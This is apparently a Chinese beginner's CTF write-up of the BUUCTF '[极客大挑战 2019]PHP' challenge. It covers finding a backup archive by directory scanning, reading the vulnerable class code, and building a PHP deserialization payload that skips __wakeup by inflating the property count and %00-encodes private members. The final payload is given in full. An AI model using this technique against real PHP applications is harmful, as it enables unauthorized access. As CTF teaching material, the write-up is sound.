web第18题
[极客大挑战 2019]PHP
打开靶场
本来页面是有一只小猫猫的,不知道为啥不见了
源码没什么可以利用的。页面提醒文件备份,那么开始的思路和另外一道题一样,
buuctf初学者学习记录–[ACTF2020 新生赛]BackupFile
先寻找备份文件,使用dirmap扫描
得到一个www.zip文件的响应码为200
访问将其下载下来解压
得到不少文件,先看看flag.php
显然不是哈哈
再查看class.php:
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
再查看index.php
index.php引入了class.php并将get收到的参数进行反序列化
这很显然是一道php反序列化的漏洞题
反序列化漏洞的简单介绍:一篇文章带你了解反序列化漏洞
这道题中只有几个简单的魔术方法,__wakeup会在反序列化成功时调用,它把username改成guest,然后__destruct方法才会调用。在里面首先判断password是不是100,如果不是就报错,然后判断username是不是admin,是的话就输出flag,否则报错
解题关键就是绕过__wakeup函数,要绕过此方法,就要使反序列化失败
对象里面的值是不能修改的,但是可以将变量个数修改,大于实际个数时就可以绕过,当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。
直接在class.php中创建对象进行序列化
由于要绕过,直接把对象个数改为3就可以,构造payload:
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
但是失败了
查了原因是因为username和password是类中的私有成员
即private属性,序列化时的格式是**%00类名%00成员名**
关于GET方式传入PHP反序列化的字符串时private和protected的注意点
最终payload:
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}